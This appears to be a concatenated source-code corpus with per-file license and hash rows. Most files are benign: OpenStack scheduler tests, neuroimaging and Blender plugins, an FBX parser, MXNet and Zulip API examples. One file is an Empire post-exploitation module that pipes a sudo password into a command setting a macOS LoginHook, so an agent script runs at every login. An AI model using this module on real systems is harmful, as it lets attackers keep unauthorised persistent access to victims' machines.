rules=rules),
instance_uuid=uuids.fake)
# 2 instances on same host
host_wit_2_inst = fakes.FakeHostState(
'host1', 'node1', {}, instances=[inst1, inst2])
return filt_cls.host_passes(host_wit_2_inst, spec_obj)
def test_group_anti_affinity_filter_with_rules_fail(self):
# the members of this group on the host already reach to max,
# create one more servers would be failed.
result = self._test_group_anti_affinity_filter_with_rules(
{"max_server_per_host": 1}, [uuids.inst1])
self.assertFalse(result)
result = self._test_group_anti_affinity_filter_with_rules(
{"max_server_per_host": 2}, [uuids.inst1, uuids.inst2])
self.assertFalse(result)
def test_group_anti_affinity_filter_with_rules_pass(self):
result = self._test_group_anti_affinity_filter_with_rules(
{"max_server_per_host": 1}, [])
self.assertTrue(result)
# we can have at most 2 members from the same group on the same host.
result = self._test_group_anti_affinity_filter_with_rules(
{"max_server_per_host": 2}, [uuids.inst1])
self.assertTrue(result)
def test_group_anti_affinity_filter_allows_instance_to_same_host(self):
fake_uuid = uuids.fake
mock_instance = objects.Instance(uuid=fake_uuid)
host_state = fakes.FakeHostState('host1', 'node1',
{}, instances=[mock_instance])
spec_obj = objects.RequestSpec(instance_group=objects.InstanceGroup(
policy='anti-affinity', hosts=['host1', 'host2'], members=[]),
instance_uuid=mock_instance.uuid)
self.assertTrue(affinity_filter.ServerGroupAntiAffinityFilter().
host_passes(host_state, spec_obj))
def _test_group_affinity_filter_passes(self, filt_cls, policy):
host = fakes.FakeHostState('host1', 'node1', {})
spec_obj = objects.RequestSpec(instance_group=None)
self.assertTrue(filt_cls.host_passes(host, spec_obj))
spec_obj = objects.RequestSpec(instance_group=objects.InstanceGroup(
policies=['anti-affinity']))
self.assertTrue(filt_cls.host_passes(host, spec_obj))
spec_obj = objects.RequestSpec(instance_group=objects.InstanceGroup(
policies=['affinity'],
hosts=['host1']))
self.assertTrue(filt_cls.host_passes(host, spec_obj))
def test_group_affinity_filter_passes(self):
self._test_group_affinity_filter_passes(
affinity_filter.ServerGroupAffinityFilter(), 'affinity')
def _test_group_affinity_filter_fails(self, filt_cls, policy):
host = fakes.FakeHostState('host1', 'node1', {})
spec_obj = objects.RequestSpec(instance_group=objects.InstanceGroup(
policies=[policy],
hosts=['host2']))
self.assertFalse(filt_cls.host_passes(host, spec_obj))
def test_group_affinity_filter_fails(self):
self._test_group_affinity_filter_fails(
affinity_filter.ServerGroupAffinityFilter(), 'affinity')
| apache-2.0 | 2,362,458,746,925,816,300 | 42.394422 | 78 | 0.628994 | false |
wanderine/BROCCOLI | code/Python_Wrapper/nipype/interfaces/broccoli/firstlevel.py | 2 | 5550 | from nipype.interfaces.base import TraitedSpec, BaseInterface, BaseInterfaceInputSpec, File, Directory, isdefined, traits
from nipype.utils.filemanip import split_filename
import scipy.io
import scipy.signal
import os
import os.path as op
import nibabel as nb
import numpy as np
import broccoli
from base import BroccoliInputSpec, BroccoliInterface
class FirstLevelAnalysisInputSpec(BroccoliInputSpec):
fMRI_file = File(exists=True, mandatory=True)
MNI_file = File(exists=True, mandatory=True)
MNI_brain_file = File(exists=True)
MNI_brain_mask_file = File(exists=True)
T1_file = File(exists=True, mandatory=True)
GLM_path = Directory(exists=True, mandatory=True)
filters_parametric = File(exists=True, mandatory=True,
desc='Matlab file with filters for parametric registration')
filters_nonparametric = File(exists=True, mandatory=True,
desc='Matlab file with filters for nonparametric registration')
iterations_parametric = traits.Int(15, usedefault=True)
iterations_nonparametric = traits.Int(10, usedefault=True)
iterations_motion_correction = traits.Int(3, usedefault=True)
beta_space = traits.Enum('EPI', 'MNI', desc='either EPI or MNI', usedefault=True)
regress_motion = traits.Bool(usedefault=True)
regress_confounds = traits.Bool(usedefault=True)
use_temporal_derivatives = traits.Bool(usedefault=True)
EPI_smoothing = traits.Float(5.5, usedefault=True)
AR_smoothing = traits.Float(7.0, usedefault=True)
class FirstLevelAnalysisOutputSpec(TraitedSpec):
statistical_map = File()
class FirstLevelAnalysis(BroccoliInterface):
input_spec = FirstLevelAnalysisInputSpec
output_spec = FirstLevelAnalysisOutputSpec
def load_regressor(self, filename, st, samples):
d = np.loadtxt(filename)
hr = np.zeros(samples * st)
tr = 2
for row in d:
start = int(round(row[0] * samples / tr))
duration = int(round(row[1] * samples / tr))
for i in range(duration):
hr[start + i] = row[2]
print(hr.shape)
print(np.count_nonzero(hr))
print(hr)
lr = scipy.signal.decimate(hr, samples)
return lr
def load_regressors(self, st):
files = [f for f in os.listdir(self.inputs.GLM_path) if op.isfile(op.join(self.inputs.GLM_path, f))]
data = [self.load_regressor(op.join(self.inputs.GLM_path, f), st, 10) for f in files]
return np.array(data).transpose()
def _run_interface(self, runtime):
MNI, MNI_brain, MNI_brain_mask, MNI_voxel_sizes = broccoli.load_MNI_templates(self.inputs.MNI_file, self.inputs.MNI_brain_file, self.inputs.MNI_brain_mask_file)
fMRI, fMRI_voxel_sizes = broccoli.load_EPI(self.inputs.fMRI_file, only_volume=False)
T1, T1_voxel_sizes = broccoli.load_T1(self.inputs.T1_file)
filters_parametric_mat = scipy.io.loadmat(self.inputs.filters_parametric)
filters_nonparametric_mat = scipy.io.loadmat(self.inputs.filters_nonparametric)
filters_parametric = [filters_parametric_mat['f%d_parametric_registration' % (i+1)] for i in range(3)]
filters_nonparametric = [filters_nonparametric_mat['f%d_nonparametric_registration' % (i+1)] for i in range(6)]
projection_tensor = [filters_nonparametric_mat['m%d' % (i+1)][0] for i in range(6)]
filter_directions = [filters_nonparametric_mat['filter_directions_%s' % d][0] for d in ['x', 'y', 'z']]
X_GLM = self.load_regressors(fMRI.shape[3])
xtx = np.linalg.inv(np.dot(X_GLM.T, X_GLM))
# print(xtx)
xtxxt_GLM = xtx.dot(X_GLM.T)
confounds = 1
if self.inputs.regress_confounds:
confounds = np.loadtxt(self.inputs.confounds_file)
contrasts = np.array([[1, 0], [1, 0], [1, 0], [1, 0]])
ctxtxc_GLM = [contrasts[i:i+1].dot(xtx).dot(contrasts[i:i+1].T) for i in range(len(contrasts))]
fMRI_voxel_sizes = [int(round(v)) for v in T1_voxel_sizes]
T1_voxel_sizes = [int(round(v)) for v in T1_voxel_sizes]
MNI_voxel_sizes = [int(round(v)) for v in T1_voxel_sizes]
statistical_maps = broccoli.performFirstLevelAnalysis(
fMRI, fMRI_voxel_sizes, T1, T1_voxel_sizes, MNI, MNI_brain, MNI_brain_mask, MNI_voxel_sizes,
filters_parametric, filters_nonparametric, projection_tensor, filter_directions,
self.inputs.iterations_parametric, self.inputs.iterations_nonparametric, self.inputs.iterations_motion_correction, 4, 4, 0, 0,
self.inputs.regress_motion, self.inputs.EPI_smoothing, self.inputs.AR_smoothing, X_GLM, xtxxt_GLM.transpose(), contrasts, ctxtxc_GLM,
self.inputs.use_temporal_derivatives, getattr(broccoli, self.inputs.beta_space), confounds, self.inputs.regress_confounds,
self.inputs.opencl_platform, self.inputs.opencl_device, self.inputs.show_results,
)
EPI_nni = nb.load(self.inputs.fMRI_file)
aligned_EPI_nni = nb.Nifti1Image(statistical_maps, None, EPI_nni.get_header())
nb.save(aligned_EPI_nni, self._get_output_filename('statistical_map.nii'))
return runtime
def _list_outputs(self):
outputs = self.output_spec().get()
for k in outputs.keys():
outputs[k] = self._get_output_filename(k + '.nii')
return outputs
| gpl-3.0 | 2,255,084,076,372,702,700 | 45.25 | 168 | 0.651171 | false |
H-uru/pyprp2 | addons/PyPRP2/object.py | 1 | 2319 | #
# Copyright (C) 2010 PyPRP2 Project Team
# See the file AUTHORS for more info about the team.
#
# PyPRP2 is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# PyPRP2 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with PyPRP2. If not, see <http://www.gnu.org/licenses/>.
import bpy
from bpy.props import *
from PyHSPlasma import *
import modifiers
import physics
class PlasmaObjectSettings(bpy.types.PropertyGroup):
physics = PointerProperty(attr = 'physics', type = physics.PlasmaPhysicsSettings)
modifiers = CollectionProperty(attr = 'modifiers', type = modifiers.PlasmaModifierLink)
drawableoverride = BoolProperty(name="Drawable Override", default = False)
activemodifier = IntProperty(attr = 'activemodifier', default = 0)
isdrawable = BoolProperty(name="Is Drawable", default=True, description="Export drawable for this object")
isdynamic = BoolProperty(name="Dynamic", default=False)
noexport = BoolProperty(name="Disable Export", default=False, description="Do not export this object to an age or prp")
class plObject(bpy.types.Panel):
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = "object"
bl_label = "Plasma Object"
def draw(self,context):
layout = self.layout
view = context.object
pl = view.plasma_settings
self.layout.prop(pl, "isdrawable")
self.layout.prop(pl, "isdynamic")
self.layout.prop(pl, "noexport")
def register():
bpy.utils.register_class(plObject)
modifiers.register()
physics.register()
bpy.utils.register_class(PlasmaObjectSettings)
def unregister():
bpy.utils.unregister_class(PlasmaObjectSettings)
physics.unregister()
modifiers.unregister()
bpy.utils.unregister_class(plObject)
| gpl-3.0 | -3,589,153,594,675,264,500 | 37.305085 | 123 | 0.695558 | false |
AOSPU/external_chromium_org | tools/perf/benchmarks/spaceport.py | 8 | 2444 | # Copyright 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Runs spaceport.io's PerfMarks benchmark."""
import logging
import os
from telemetry import test
from telemetry.core import util
from telemetry.page import page_measurement
from telemetry.page import page_set
class _SpaceportMeasurement(page_measurement.PageMeasurement):
def __init__(self):
super(_SpaceportMeasurement, self).__init__()
def CustomizeBrowserOptions(self, options):
options.AppendExtraBrowserArgs('--disable-gpu-vsync')
def MeasurePage(self, page, tab, results):
tab.WaitForJavaScriptExpression(
'!document.getElementById("start-performance-tests").disabled', 60)
tab.ExecuteJavaScript("""
window.__results = {};
window.console.log = function(str) {
if (!str) return;
var key_val = str.split(': ');
if (!key_val.length == 2) return;
__results[key_val[0]] = key_val[1];
};
document.getElementById('start-performance-tests').click();
""")
num_results = 0
num_tests_in_spaceport = 24
while num_results < num_tests_in_spaceport:
tab.WaitForJavaScriptExpression(
'Object.keys(window.__results).length > %d' % num_results, 180)
num_results = tab.EvaluateJavaScript(
'Object.keys(window.__results).length')
logging.info('Completed test %d of %d' %
(num_results, num_tests_in_spaceport))
result_dict = eval(tab.EvaluateJavaScript(
'JSON.stringify(window.__results)'))
for key in result_dict:
chart, trace = key.split('.', 1)
results.Add(trace, 'objects (bigger is better)', float(result_dict[key]),
chart_name=chart, data_type='unimportant')
results.Add('Score', 'objects (bigger is better)',
[float(x) for x in result_dict.values()])
# crbug.com/166703: This test frequently times out on Windows.
@test.Disabled('mac', 'win')
class Spaceport(test.Test):
"""spaceport.io's PerfMarks benchmark."""
test = _SpaceportMeasurement
def CreatePageSet(self, options):
spaceport_dir = os.path.join(util.GetChromiumSrcDir(), 'chrome', 'test',
'data', 'third_party', 'spaceport')
ps = page_set.PageSet(file_path=spaceport_dir)
ps.AddPageWithDefaultRunNavigate('file://index.html')
return ps
| bsd-3-clause | 7,945,202,486,372,402,000 | 34.42029 | 79 | 0.658756 | false |
byt3bl33d3r/Empire | lib/modules/python/persistence/osx/loginhook.py | 10 | 4626 | class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'LoginHook',
# list of one or more authors for the module
'Author': ['@Killswitch-GUI'],
# more verbose multi-line description of the module
'Description': ('Installs Empire agent via LoginHook.'),
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension' : None,
# if the module needs administrative privileges
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : False,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': ["https://support.apple.com/de-at/HT2420"]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'Password' : {
'Description' : 'User password for sudo.',
'Required' : True,
'Value' : ''
},
'LoginHookScript' : {
'Description' : 'Full path of the script to be executed/',
'Required' : True,
'Value' : '/Users/Username/Desktop/kill-me.sh'
},
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
loginhookScriptPath = self.options['LoginHookScript']['Value']
password = self.options['Password']['Value']
password = password.replace('$', '\$')
password = password.replace('$', '\$')
password = password.replace('!', '\!')
password = password.replace('!', '\!')
script = """
import subprocess
import sys
try:
process = subprocess.Popen('which sudo|wc -l', stdout=subprocess.PIPE, shell=True)
result = process.communicate()
result = result[0].strip()
if str(result) != "1":
print "[!] ERROR to create a LoginHook requires (sudo) privileges!"
sys.exit()
try:
print " [*] Setting script to proper linux permissions"
process = subprocess.Popen('chmod +x %s', stdout=subprocess.PIPE, shell=True)
process.communicate()
except Exception as e:
print "[!] Issues setting login hook (line 81): " + str(e)
print " [*] Creating proper LoginHook"
try:
process = subprocess.Popen('echo "%s" | sudo -S defaults write com.apple.loginwindow LoginHook %s', stdout=subprocess.PIPE, shell=True)
process.communicate()
except Exception as e:
print "[!] Issues setting login hook (line 81): " + str(e)
try:
process = subprocess.Popen('echo "%s" | sudo -S defaults read com.apple.loginwindow', stdout=subprocess.PIPE, shell=True)
print " [*] LoginHook Output: "
result = process.communicate()
result = result[0].strip()
print " [*] LoginHook set to:"
print str(result)
except Exception as e:
print "[!] Issue checking LoginHook settings (line 86): " + str(e)
except Exception as e:
print "[!] Issue with LoginHook script: " + str(e)
""" % (loginhookScriptPath, password, loginhookScriptPath, password)
return script
| bsd-3-clause | -6,961,776,777,605,648,000 | 36.918033 | 143 | 0.561608 | false |
PLyczkowski/Sticky-Keymap | 2.74/scripts/addons/io_scene_fbx/fbx2json.py | 3 | 9356 | #!/usr/bin/env python3
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# <pep8 compliant>
# Script copyright (C) 2006-2012, assimp team
# Script copyright (C) 2013 Blender Foundation
"""
Usage
=====
fbx2json [FILES]...
This script will write a JSON file for each FBX argument given.
Output
======
The JSON data is formatted into a list of nested lists of 4 items:
``[id, [data, ...], "data_types", [subtree, ...]]``
Where each list may be empty, and the items in
the subtree are formatted the same way.
data_types is a string, aligned with data that spesifies a type
for each property.
The types are as follows:
* 'Y': - INT16
* 'C': - BOOL
* 'I': - INT32
* 'F': - FLOAT32
* 'D': - FLOAT64
* 'L': - INT64
* 'R': - BYTES
* 'S': - STRING
* 'f': - FLOAT32_ARRAY
* 'i': - INT32_ARRAY
* 'd': - FLOAT64_ARRAY
* 'l': - INT64_ARRAY
* 'b': - BOOL ARRAY
* 'c': - BYTE ARRAY
Note that key:value pairs aren't used since the id's are not
ensured to be unique.
"""
# ----------------------------------------------------------------------------
# FBX Binary Parser
from struct import unpack
import array
import zlib
# at the end of each nested block, there is a NUL record to indicate
# that the sub-scope exists (i.e. to distinguish between P: and P : {})
# this NUL record is 13 bytes long.
_BLOCK_SENTINEL_LENGTH = 13
_BLOCK_SENTINEL_DATA = (b'\0' * _BLOCK_SENTINEL_LENGTH)
_IS_BIG_ENDIAN = (__import__("sys").byteorder != 'little')
_HEAD_MAGIC = b'Kaydara FBX Binary\x20\x20\x00\x1a\x00'
from collections import namedtuple
FBXElem = namedtuple("FBXElem", ("id", "props", "props_type", "elems"))
del namedtuple
def read_uint(read):
return unpack(b'<I', read(4))[0]
def read_ubyte(read):
return unpack(b'B', read(1))[0]
def read_string_ubyte(read):
size = read_ubyte(read)
data = read(size)
return data
def unpack_array(read, array_type, array_stride, array_byteswap):
length = read_uint(read)
encoding = read_uint(read)
comp_len = read_uint(read)
data = read(comp_len)
if encoding == 0:
pass
elif encoding == 1:
data = zlib.decompress(data)
assert(length * array_stride == len(data))
data_array = array.array(array_type, data)
if array_byteswap and _IS_BIG_ENDIAN:
data_array.byteswap()
return data_array
read_data_dict = {
b'Y'[0]: lambda read: unpack(b'<h', read(2))[0], # 16 bit int
b'C'[0]: lambda read: unpack(b'?', read(1))[0], # 1 bit bool (yes/no)
b'I'[0]: lambda read: unpack(b'<i', read(4))[0], # 32 bit int
b'F'[0]: lambda read: unpack(b'<f', read(4))[0], # 32 bit float
b'D'[0]: lambda read: unpack(b'<d', read(8))[0], # 64 bit float
b'L'[0]: lambda read: unpack(b'<q', read(8))[0], # 64 bit int
b'R'[0]: lambda read: read(read_uint(read)), # binary data
b'S'[0]: lambda read: read(read_uint(read)), # string data
b'f'[0]: lambda read: unpack_array(read, 'f', 4, False), # array (float)
b'i'[0]: lambda read: unpack_array(read, 'i', 4, True), # array (int)
b'd'[0]: lambda read: unpack_array(read, 'd', 8, False), # array (double)
b'l'[0]: lambda read: unpack_array(read, 'q', 8, True), # array (long)
b'b'[0]: lambda read: unpack_array(read, 'b', 1, False), # array (bool)
b'c'[0]: lambda read: unpack_array(read, 'B', 1, False), # array (ubyte)
}
def read_elem(read, tell, use_namedtuple):
# [0] the offset at which this block ends
# [1] the number of properties in the scope
# [2] the length of the property list
end_offset = read_uint(read)
if end_offset == 0:
return None
prop_count = read_uint(read)
prop_length = read_uint(read)
elem_id = read_string_ubyte(read) # elem name of the scope/key
elem_props_type = bytearray(prop_count) # elem property types
elem_props_data = [None] * prop_count # elem properties (if any)
elem_subtree = [] # elem children (if any)
for i in range(prop_count):
data_type = read(1)[0]
elem_props_data[i] = read_data_dict[data_type](read)
elem_props_type[i] = data_type
if tell() < end_offset:
while tell() < (end_offset - _BLOCK_SENTINEL_LENGTH):
elem_subtree.append(read_elem(read, tell, use_namedtuple))
if read(_BLOCK_SENTINEL_LENGTH) != _BLOCK_SENTINEL_DATA:
raise IOError("failed to read nested block sentinel, "
"expected all bytes to be 0")
if tell() != end_offset:
raise IOError("scope length not reached, something is wrong")
args = (elem_id, elem_props_data, elem_props_type, elem_subtree)
return FBXElem(*args) if use_namedtuple else args
def parse_version(fn):
"""
Return the FBX version,
if the file isn't a binary FBX return zero.
"""
with open(fn, 'rb') as f:
read = f.read
if read(len(_HEAD_MAGIC)) != _HEAD_MAGIC:
return 0
return read_uint(read)
def parse(fn, use_namedtuple=True):
root_elems = []
with open(fn, 'rb') as f:
read = f.read
tell = f.tell
if read(len(_HEAD_MAGIC)) != _HEAD_MAGIC:
raise IOError("Invalid header")
fbx_version = read_uint(read)
while True:
elem = read_elem(read, tell, use_namedtuple)
if elem is None:
break
root_elems.append(elem)
args = (b'', [], bytearray(0), root_elems)
return FBXElem(*args) if use_namedtuple else args, fbx_version
# ----------------------------------------------------------------------------
# Inline Modules
# pyfbx.data_types
data_types = type(array)("data_types")
data_types.__dict__.update(
dict(
INT16 = b'Y'[0],
BOOL = b'C'[0],
INT32 = b'I'[0],
FLOAT32 = b'F'[0],
FLOAT64 = b'D'[0],
INT64 = b'L'[0],
BYTES = b'R'[0],
STRING = b'S'[0],
FLOAT32_ARRAY = b'f'[0],
INT32_ARRAY = b'i'[0],
FLOAT64_ARRAY = b'd'[0],
INT64_ARRAY = b'l'[0],
BOOL_ARRAY = b'b'[0],
BYTE_ARRAY = b'c'[0],
))
# pyfbx.parse_bin
parse_bin = type(array)("parse_bin")
parse_bin.__dict__.update(
dict(
parse = parse
))
# ----------------------------------------------------------------------------
# JSON Converter
# from pyfbx import parse_bin, data_types
import json
import array
def fbx2json_property_as_string(prop, prop_type):
if prop_type == data_types.STRING:
prop_str = prop.decode('utf-8')
prop_str = prop_str.replace('\x00\x01', '::')
return json.dumps(prop_str)
else:
prop_py_type = type(prop)
if prop_py_type == bytes:
return json.dumps(repr(prop)[2:-1])
elif prop_py_type == bool:
return json.dumps(prop)
elif prop_py_type == array.array:
return repr(list(prop))
return repr(prop)
def fbx2json_properties_as_string(fbx_elem):
return ", ".join(fbx2json_property_as_string(*prop_item)
for prop_item in zip(fbx_elem.props,
fbx_elem.props_type))
def fbx2json_recurse(fw, fbx_elem, ident, is_last):
fbx_elem_id = fbx_elem.id.decode('utf-8')
fw('%s["%s", ' % (ident, fbx_elem_id))
fw('[%s], ' % fbx2json_properties_as_string(fbx_elem))
fw('"%s", ' % (fbx_elem.props_type.decode('ascii')))
fw('[')
if fbx_elem.elems:
fw('\n')
ident_sub = ident + " "
for fbx_elem_sub in fbx_elem.elems:
fbx2json_recurse(fw, fbx_elem_sub, ident_sub,
fbx_elem_sub is fbx_elem.elems[-1])
fw(']')
fw(']%s' % ('' if is_last else ',\n'))
def fbx2json(fn):
import os
fn_json = "%s.json" % os.path.splitext(fn)[0]
print("Writing: %r " % fn_json, end="")
fbx_root_elem, fbx_version = parse(fn, use_namedtuple=True)
print("(Version %d) ..." % fbx_version)
with open(fn_json, 'w', encoding="ascii", errors='xmlcharrefreplace') as f:
fw = f.write
fw('[\n')
ident_sub = " "
for fbx_elem_sub in fbx_root_elem.elems:
fbx2json_recurse(f.write, fbx_elem_sub, ident_sub,
fbx_elem_sub is fbx_root_elem.elems[-1])
fw(']\n')
# ----------------------------------------------------------------------------
# Command Line
def main():
import sys
if "--help" in sys.argv:
print(__doc__)
return
for arg in sys.argv[1:]:
try:
fbx2json(arg)
except:
print("Failed to convert %r, error:" % arg)
import traceback
traceback.print_exc()
if __name__ == "__main__":
main()
| gpl-2.0 | -8,405,879,069,700,308,000 | 27.351515 | 79 | 0.575246 | false |
precedenceguo/mxnet | python/mxnet/_ctypes/symbol.py | 28 | 4282 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# coding: utf-8
# pylint: disable=invalid-name, protected-access, too-many-arguments, global-statement
"""Symbolic configuration API."""
from __future__ import absolute_import as _abs
import ctypes
from ..base import _LIB
from ..base import c_str_array, c_handle_array, c_str, mx_uint
from ..base import SymbolHandle
from ..base import check_call
_symbol_cls = None
class SymbolBase(object):
"""Symbol is symbolic graph."""
__slots__ = ["handle"]
# pylint: disable=no-member
def __init__(self, handle):
"""Initialize the function with handle
Parameters
----------
handle : SymbolHandle
the handle to the underlying C++ Symbol
"""
self.handle = handle
def __del__(self):
check_call(_LIB.NNSymbolFree(self.handle))
def _compose(self, *args, **kwargs):
"""Compose symbol on inputs.
This call mutates the current symbol.
Parameters
----------
args:
provide positional arguments
kwargs:
provide keyword arguments
Returns
-------
the resulting symbol
"""
name = kwargs.pop('name', None)
if name:
name = c_str(name)
if len(args) != 0 and len(kwargs) != 0:
raise TypeError('compose only accept input Symbols \
either as positional or keyword arguments, not both')
for arg in args:
if not isinstance(arg, SymbolBase):
raise TypeError('Compose expect `Symbol` as arguments')
for val in kwargs.values():
if not isinstance(val, SymbolBase):
raise TypeError('Compose expect `Symbol` as arguments')
num_args = len(args) + len(kwargs)
if len(kwargs) != 0:
keys = c_str_array(kwargs.keys())
args = c_handle_array(kwargs.values())
else:
keys = None
args = c_handle_array(kwargs.values())
check_call(_LIB.NNSymbolCompose(
self.handle, name, num_args, keys, args))
def _set_attr(self, **kwargs):
"""Set the attribute of the symbol.
Parameters
----------
**kwargs
The attributes to set
"""
keys = c_str_array(kwargs.keys())
vals = c_str_array([str(s) for s in kwargs.values()])
num_args = mx_uint(len(kwargs))
check_call(_LIB.MXSymbolSetAttrs(
self.handle, num_args, keys, vals))
def _set_handle(self, handle):
"""Set handle."""
self.handle = handle
def __reduce__(self):
return (_symbol_cls, (None,), self.__getstate__())
def _set_symbol_class(cls):
"""Set the symbolic class to be cls"""
global _symbol_cls
_symbol_cls = cls
def _symbol_creator(handle, args, kwargs, keys, vals, name):
sym_handle = SymbolHandle()
check_call(_LIB.MXSymbolCreateAtomicSymbol(
ctypes.c_void_p(handle),
mx_uint(len(keys)),
c_str_array(keys),
c_str_array([str(v) for v in vals]),
ctypes.byref(sym_handle)))
if args and kwargs:
raise TypeError(
'Operators with variable length input can only accept input'
'Symbols either as positional or keyword arguments, not both')
s = _symbol_cls(sym_handle)
if args:
s._compose(*args, name=name)
elif kwargs:
s._compose(name=name, **kwargs)
else:
s._compose(name=name)
return s
| apache-2.0 | -5,679,928,344,425,097,000 | 30.028986 | 87 | 0.606959 | false |
punchagan/zulip | zerver/openapi/python_examples.py | 1 | 48058 | # Zulip's OpenAPI-based API documentation system is documented at
# https://zulip.readthedocs.io/en/latest/documentation/api.html
#
# This file defines the Python code examples that appears in Zulip's
# REST API documentation, and also contains a system for running the
# example code as part of the `tools/test-api` test suite.
#
# The actual documentation appears within these blocks:
# # {code_example|start}
# Code here
# # {code_example|end}
#
# Whereas the surrounding code is test setup logic.
import json
import os
import sys
from functools import wraps
from typing import Any, Callable, Dict, Iterable, List, Optional, Set, TypeVar, cast
from zulip import Client
from zerver.lib import mdiff
from zerver.models import get_realm, get_user
from zerver.openapi.openapi import validate_against_openapi_schema
ZULIP_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
TEST_FUNCTIONS: Dict[str, Callable[..., object]] = {}
REGISTERED_TEST_FUNCTIONS: Set[str] = set()
CALLED_TEST_FUNCTIONS: Set[str] = set()
FuncT = TypeVar("FuncT", bound=Callable[..., object])
def openapi_test_function(endpoint: str) -> Callable[[FuncT], FuncT]:
"""This decorator is used to register an OpenAPI test function with
its endpoint. Example usage:
@openapi_test_function("/messages/render:post")
def ...
"""
def wrapper(test_func: FuncT) -> FuncT:
@wraps(test_func)
def _record_calls_wrapper(*args: object, **kwargs: object) -> object:
CALLED_TEST_FUNCTIONS.add(test_func.__name__)
return test_func(*args, **kwargs)
REGISTERED_TEST_FUNCTIONS.add(test_func.__name__)
TEST_FUNCTIONS[endpoint] = _record_calls_wrapper
return cast(FuncT, _record_calls_wrapper) # https://github.com/python/mypy/issues/1927
return wrapper
def ensure_users(ids_list: List[int], user_names: List[str]) -> None:
# Ensure that the list of user ids (ids_list)
# matches the users we want to refer to (user_names).
realm = get_realm("zulip")
user_ids = [get_user(name + "@zulip.com", realm).id for name in user_names]
assert ids_list == user_ids
@openapi_test_function("/users/me/subscriptions:post")
def add_subscriptions(client: Client) -> None:
# {code_example|start}
# Subscribe to the stream "new stream"
result = client.add_subscriptions(
streams=[
{
"name": "new stream",
"description": "New stream for testing",
},
],
)
# {code_example|end}
validate_against_openapi_schema(result, "/users/me/subscriptions", "post", "200_0")
# {code_example|start}
# To subscribe other users to a stream, you may pass
# the `principals` argument, like so:
user_id = 26
result = client.add_subscriptions(
streams=[
{"name": "new stream", "description": "New stream for testing"},
],
principals=[user_id],
)
# {code_example|end}
assert result["result"] == "success"
assert "[email protected]" in result["subscribed"]
def test_add_subscriptions_already_subscribed(client: Client) -> None:
result = client.add_subscriptions(
streams=[
{"name": "new stream", "description": "New stream for testing"},
],
principals=["[email protected]"],
)
validate_against_openapi_schema(result, "/users/me/subscriptions", "post", "200_1")
def test_authorization_errors_fatal(client: Client, nonadmin_client: Client) -> None:
client.add_subscriptions(
streams=[
{"name": "private_stream"},
],
)
stream_id = client.get_stream_id("private_stream")["stream_id"]
client.call_endpoint(
f"streams/{stream_id}",
method="PATCH",
request={"is_private": True},
)
result = nonadmin_client.add_subscriptions(
streams=[
{"name": "private_stream"},
],
authorization_errors_fatal=False,
)
validate_against_openapi_schema(result, "/users/me/subscriptions", "post", "400_0")
result = nonadmin_client.add_subscriptions(
streams=[
{"name": "private_stream"},
],
authorization_errors_fatal=True,
)
validate_against_openapi_schema(result, "/users/me/subscriptions", "post", "400_1")
@openapi_test_function("/users/{user_id_or_email}/presence:get")
def get_user_presence(client: Client) -> None:
# {code_example|start}
# Get presence information for "[email protected]"
result = client.get_user_presence("[email protected]")
# {code_example|end}
validate_against_openapi_schema(result, "/users/{user_id_or_email}/presence", "get", "200")
@openapi_test_function("/users/me/presence:post")
def update_presence(client: Client) -> None:
request = {
"status": "active",
"ping_only": False,
"new_user_input": False,
}
result = client.update_presence(request)
assert result["result"] == "success"
@openapi_test_function("/users:post")
def create_user(client: Client) -> None:
# {code_example|start}
# Create a user
request = {
"email": "[email protected]",
"password": "temp",
"full_name": "New User",
}
result = client.create_user(request)
# {code_example|end}
validate_against_openapi_schema(result, "/users", "post", "200")
# Test "Email already used error"
result = client.create_user(request)
validate_against_openapi_schema(result, "/users", "post", "400")
@openapi_test_function("/users:get")
def get_members(client: Client) -> None:
# {code_example|start}
# Get all users in the realm
result = client.get_members()
# {code_example|end}
